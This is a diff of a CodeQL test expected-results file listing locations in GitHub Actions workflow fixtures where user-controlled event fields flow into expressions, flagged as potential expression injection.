github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | github.event.pull_request.title | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | github.event.pull_request.body | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | github.event.review.body | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | github.event.pull_request.title | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | github.event.pull_request.body | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | github.event.comment.body | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | github.event.pull_request.title | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | github.event.pull_request.body | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | github.event.pull_request.head.ref | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | github.head_ref | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | github.event.commits[11].message | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | github.event.commits[11].author.email | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | github.event.commits[11].author.name | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | github.event.head_commit.message | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | github.event.head_commit.author.email | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | github.event.head_commit.author.name | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | github.event.head_commit.committer.email | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | github.event.head_commit.committer.name | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | github.event.commits[11].committer.email | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | github.event.commits[11].committer.name | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | steps.summary.outputs.value | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | steps.step.outputs.value | +| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | needs.job1.outputs.job_output | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | github.event.workflow_run.display_title | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | github.event.workflow_run.head_commit.message | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | github.event.workflow_run.head_commit.author.email | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | github.event.workflow_run.head_commit.author.name | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | github.event.workflow_run.head_commit.committer.email | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | github.event.workflow_run.head_commit.committer.name | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | github.event.workflow_run.head_repository.description | diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected index 1ea054565bc1..cb924c97ea12 100644 --- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected 
@@ -1,269 +1,269 @@ edges -| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | -| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | -| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | -| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:21:14:24:15 | \| | -| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | -| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | -| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | -| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | .github/workflows/cross3.yml:41:12:43:5 | \| | -| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | .github/workflows/cross3.yml:61:21:68:47 | \| | -| .github/workflows/cross3.yml:61:21:68:47 | \| | .github/workflows/cross3.yml:47:12:53:109 | \| | -| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | -| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... 
_url }} | -| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | -| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | -| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | -| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | -| .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | -| .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... 
iles }} | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | -| .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | -| .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | -| .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | -| .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... 
env }}' | -| .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | -| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | -| .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | -| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | .github/workflows/matrix.yml:41:12:42:31 | \| | -| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | -| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | -| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | -| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | -| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | -| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | -| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | -| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | -| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... 
value}} | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | -| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | -| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | +| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | +| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | +| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | +| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | +| .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | +| 
.github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | +| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | +| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | +| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | +| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | 
